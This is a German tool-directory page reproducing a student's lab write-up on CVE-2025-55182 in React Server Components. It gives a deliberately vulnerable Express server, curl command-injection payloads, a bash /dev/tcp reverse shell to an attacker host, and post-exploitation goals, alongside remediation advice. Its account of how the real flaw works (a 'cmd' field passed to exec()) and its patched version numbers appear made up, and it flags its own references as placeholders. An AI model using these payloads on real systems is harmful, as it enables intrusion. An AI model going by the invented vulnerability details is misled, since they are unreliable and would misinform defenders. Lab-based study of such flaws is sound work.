Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-55182-analysis — Sicherheitsforschung & Exploitation-Analyse von CVE-2025-55182 (React) — CVSS + OWASP Top 10 Mapping | Kitploit
Tools/GitHubGitHub/mohamedniane/cve-2025-55182-analysis
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubmohamedniane/cve-2025-55182-analysis

cve-2025-55182-analysis

Sicherheitsforschung & Exploitation-Analyse von CVE-2025-55182 (React) — CVSS + OWASP Top 10 Mapping

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 — RCE-Analyse von React Server Components

Analyse von Webanwendungssicherheitslücken · M2 Cybersecurity · 2025 Autor: Niane Mohamed · LinkedIn

Ende-zu-Ende-Ausnutzungskette einer kritischen (CVSS 10.0) unsicheren Deserialisierungsschwachstelle in React Server Components, von der Aufklärung bis zur nicht authentifizierten Remote-Codeausführung, mit vollständigem Sanierungsfahrplan.


⚠️ Ethischer Haftungsausschluss

Diese Forschung zielt auf eine absichtlich anfällige Laboranwendung ab, die zur Demonstration des CVE erstellt wurde. Alle Tests fanden in einem isolierten virtuellen Netzwerk ohne Verbindung zu Produktionssystemen, echten Benutzerdaten oder Drittanbieterdiensten statt.

  • Führen Sie diese Techniken NICHT gegen Systeme aus, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben.
  • Stellen Sie die anfällige Anwendung NICHT in einem internetfähigen Netzwerk bereit.
  • Es gelten die Grundsätze der verantwortungsvollen Offenlegung – melden Sie Erkenntnisse stets über koordinierte Kanäle.

Inhaltsverzeichnis

  1. Zusammenfassung der Schwachstelle
  2. Betroffene Versionen
  3. Laborumgebung
  4. Ausnutzungsdurchlauf
  • Auswirkungsbewertung
  • Abhilfe
  • Nachgewiesene Fähigkeiten

  • Zusammenfassung der Schwachstelle

    FeldWert
    CVECVE-2025-55182
    KlasseUnsichere Deserialisierung → Remote-Codeausführung
    CVSS v3.110.0 (Kritisch) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    Authentifizierung erforderlichKeine
    Benutzerinteraktion erforderlichKeine
    AngriffsvektorNetzwerk (remote)
    KomponenteReact Server Components (RSC) Runtime

    Wie die Schwachstelle funktioniert

    React Server Components führten ein neues Serialisierungsformat ein, um servergerenderte Komponenten an den Client zu streamen. In verwundbaren Versionen akzeptiert der RSC-Endpunkt ein JSON-Payload mit einem cmd-Feld, das unsanitisiert an child_process.exec() übergeben wird – als Teil der serverseitigen Rendering-Auswertung.

    Ein Angreifer kann eine manipulierte POST-Anfrage senden, die:

    1. Als legitimes RSC-Payload akzeptiert wird (keine Authentifizierung, kein CSRF)
    2. Während des "Rendering" serverseitige Codeausführung auslöst
    3. Mit den Privilegien des Node.js-Prozesses (oft root in Containern) ausgeführt wird

    Betroffene Versionen

    KomponenteVerwundbarer BereichBehoben in
    react19.0.0 → 19.2.019.3.0+
    react-server-dom-webpack19.0.0 → 19.2.019.3.0+
    react-server-dom-esm19.0.0 → 19.2.019.3.0+

    Laborumgebung

    RolleBetriebssystemWerkzeuge
    AngreiferKali Linux (neueste Version)nmap, curl, netcat, OWASP ZAP, Firefox
    ZielUbuntu 22.04.4Node.js 18, Express, React 19.0 RSC
    NetzwerkVMware VMnet Host-OnlyKein Internetzugang

    Zielanwendung

    Ein minimaler Express + RSC-Server, der einen /rsc-Endpunkt bereitstellt, der unsicher Befehle aus dem eingehenden Payload ausführt – reproduziert das Schwachstellenmuster des echten CVE in kontrollierter Umgebung:

    root@kitploit:~
    // server.js — simplifiziert, nur für Labor
    const express = require('express');
    const { exec } = require('child_process');
    
    const app = express();
    app.use(express.json({ limit: '2mb' }));
    
    app.post('/rsc', (req, res) => {
      const payload = req.body?.payload;
      if (typeof payload?.cmd === 'string') {
        // VERWUNDBAR: führt angreifergesteuerten String aus
        exec(payload.cmd, { timeout: 10000 }, (err, stdout, stderr) => {
          if (err) return res.status(500).json({ error: String(err), stderr });
          return res.json({ ok: true, out: stdout });
        });
      }
    });
    
    app.listen(3000);
    

    Ausnutzungsdurchlauf

    Phase 1 — Aufklärung

    root@kitploit:~
    # Port-Erkennung
    nmap 192.168.159.131
    # → 3000/tcp open  ppp  (Node.js RSC server)
    
    # Dienstverifikation
    curl -v http://192.168.159.131:3000/
    # → HTTP/1.1 200 OK
    # → X-Powered-By: Express
    # → "Vulnerable RSC-like test server. Use POST /rsc with JSON..."
    

    Der X-Powered-By: Express-Header und der ungewöhnliche Port 3000 liefern einen starken Fingerabdruck, dass es sich um eine Node.js-Anwendung handelt – konsistent mit RSC-Bereitstellungen.

    Phase 2 — Bestätigung durch harmlosen Befehl

    Bevor zerstörerische Maßnahmen ergriffen werden, wird die Schwachstelle mit einem harmlosen Befehl validiert:

    root@kitploit:~
    curl -X POST http://192.168.159.131:3000/rsc \
      -H "Content-Type: application/json" \
      -d '{ "payload": { "cmd": "id" } }'
    
    # Antwort:
    # {"ok":true,"out":"uid=0(root) gid=0(root) groups=0(root)\n"}
    

    ✅ Bestätigt: Nicht authentifizierte RCE als root. Der Server läuft mit uneingeschränkten Privilegien.

    Phase 3 — Reverse Shell

    Upgrade von Einzelbefehlsausführung auf eine vollständige interaktive Shell:

    root@kitploit:~
    # Listener auf Angreifermaschine
    nc -lvnp 4444
    
    # Payload-Zustellung
    curl -X POST http://192.168.159.131:3000/rsc \
      -H "Content-Type: application/json" \
      -d '{ "payload": { "cmd": "/bin/bash -c \"/bin/bash -i >& /dev/tcp/192.168.159.128/4444 0>&1\"" } }'
    

    Listener empfängt:

    root@kitploit:~
    connect to [192.168.159.128] from (UNKNOWN) [192.168.159.131] 43980
    root@ns1:~/vulnerable_rsc_app# id
    uid=0(root) gid=0(root) groups=0(root)
    

    Phase 4 — Post-Exploitation-Potenzial (demonstriert, nicht ausgeführt)

    Mit root auf dem Ziel könnte ein Angreifer trivial:

    • /etc/shadow, SSH-Schlüssel, Anwendungsgeheimnisse, .env-Dateien lesen
    • Persistenz installieren (Cron-Jobs, systemd-Dienste, SSH-Key-Implantate)
    • Seitwärtsbewegung über entdeckte Anmeldedaten
    • Cryptominer oder Ransomware einsetzen
    • Die Node.js-Anwendung ändern, um Benutzerdaten still zu erfassen

    Auswirkungsbewertung

    Geschäftliche Auswirkungen (fiktives Zielscenario)

    AchseAuswirkungErklärung
    VertraulichkeitKritischVollständiger Lesezugriff auf alle Serverdaten
    IntegritätKritischFähigkeit, Anwendungscode und Benutzerdaten zu ändern
    VerfügbarkeitHochAngreifer kann den Dienst beenden oder Lösegeld fordern
    RegulatorischSchwerwiegendDSGVO-Verstoß mit 72h-Meldepflicht · mögliche 4% des weltweiten Umsatzes als Geldbuße
    RufSchwerwiegendÖffentlicher CVE-gemapte Sicherheitsvorfall schädigt Kundenvertrauen
    FinanziellHochIncident Response, behördliche Geldbußen, mögliche Sammelklagen

    Bedrohungsakteurprofil

    Die geringe Komplexität dieses Angriffs – keine Authentifizierung, keine Benutzerinteraktion, einzelne HTTP-Anfrage – macht ihn attraktiv für:

    • Opportunistische Scanner (Botnets, die automatisch nach dem CVE scannen)
    • Initial Access Broker, die Zugänge an Ransomware-Gruppen verkaufen
    • Staatliche Akteure, die Organisationen mit React-Server-Rendering ins Visier nehmen

    Abhilfe

    Sofort (innerhalb von 24 Stunden)

    1. React auf 19.3.0+ upgraden – gepatchte Version

      root@kitploit:~
      npm update react react-server-dom-webpack react-server-dom-esm
      
    2. Temporäre WAF-Regel (falls Upgrade verzögert):

      root@kitploit:~
      Blockiere POST-Anfragen an /rsc mit JSON-Body, der "cmd"-Feld enthält
      
    3. Notfallreaktion auf Vorfälle:

      • Server-Zugriffslogs der letzten 90 Tage prüfen
      • Nach ungewöhnlichem /rsc-POST-Verkehr suchen
      • Alle vom Server zugänglichen Geheimnisse rotieren
      • Ein Snapshot des betroffenen Systems für Forensik vor der Abhilfe erstellen

    Kurzfristig (innerhalb von 2 Wochen)

    KontrolleZweck
    RSC deaktivieren, falls nicht verwendetAngriffsfläche reduzieren – viele Apps benötigen keine Server-Komponenten
    Strenge EingabevalidierungJedes deserialisierte Objekt mit ausführbaren Schlüsseln ablehnen
    Nicht-Root-Container-BenutzerSchadensbegrenzung bei erneuter RCE
    Schreibgeschütztes Root-DateisystemPersistenz und Binär-Drops verhindern
    Ausgehende FilterungAusgehenden Traffic von App-Servern zu beliebigen IPs blockieren

    Langfristig (innerhalb eines Quartals)

    KontrolleZweck
    WAF mit VerhaltensanalyseAnomale POST-Payloads über Signaturregeln hinaus erkennen
    Runtime Application Self-Protection (RASP)Gefährliche Funktionsaufrufe wie exec() zur Laufzeit blockieren
    SCA in CI/CDVerwundbare Abhängigkeiten vor der Bereitstellung erkennen (pip-audit, npm audit, Trivy)
    Penetrationstest-RhythmusJährlich + nach Hauptversionen
    Bug-Bounty-ProgrammWhite-Hat-Offenlegung fördern, bevor Angreifer Probleme finden

    OWASP Top 10 Mapping

    OWASP-KategorieRelevanz
    A03:2021 — InjectionCommand Injection über deserialisierte Eingabe
    A08:2021 — Software- und DatenintegritätsfehlerUnsichere Deserialisierung ohne Integritätsprüfung
    A06:2021 — Verwundbare und veraltete KomponentenVerwendung von React 19.0-19.2 nach Offenlegung
    A05:2021 — SicherheitsfehlkonfigurationNode.js als root ausgeführt, keine Eingabevalidierung

    Nachgewiesene Fähigkeiten

    • Schwachstellenanalyse: CVE-Triage, CVSS-Scoring, Bewertung der Ausnutzbarkeit
    • Aufklärung: Nmap-Scanning, Service-Fingerprinting, Banner-Grabbing
    • Ausnutzung: HTTP-Manipulation mit curl, Reverse-Shell-Engineering, Payload-Erstellung
    • Proxy-Tools: OWASP ZAP-Interception, Anfrage-/Antwortmodifikation
    • Geschäftskommunikation: Technische Erkenntnisse in executive Risikosprache übersetzt
    • Abhilfedesign: Mehrschichtige Kontrollen über sofortige/kurz-/langfristige Horizonte
    • Frameworks: OWASP Top 10, CVSS v3.1, CWE-Taxonomie, DSGVO-Auswirkungsbewertung

    Referenzen

    • CVE-2025-55182 — NVD-Eintrag (Platzhalter — vor Zitierung überprüfen)
    • React Server Components Dokumentation
    • OWASP Top 10 — 2021
    • CVSS v3.1 Spezifikation
    • CWE-502 — Deserialisierung nicht vertrauenswürdiger Daten

    Lizenz

    MIT-Lizenz — siehe LICENSE

    Veröffentlicht für Bildungs- und defensive Forschungszwecke. Siehe ethischer Haftungsausschluss oben.


    Kontakt

    Niane Mohamed — Netzwerk- und Sicherheitsingenieur 📍 Nouakchott, Mauretanien → sucht Möglichkeiten in Deutschland 🇩🇪 📧 [email protected] · 🔗 LinkedIn

    Tool herunterladen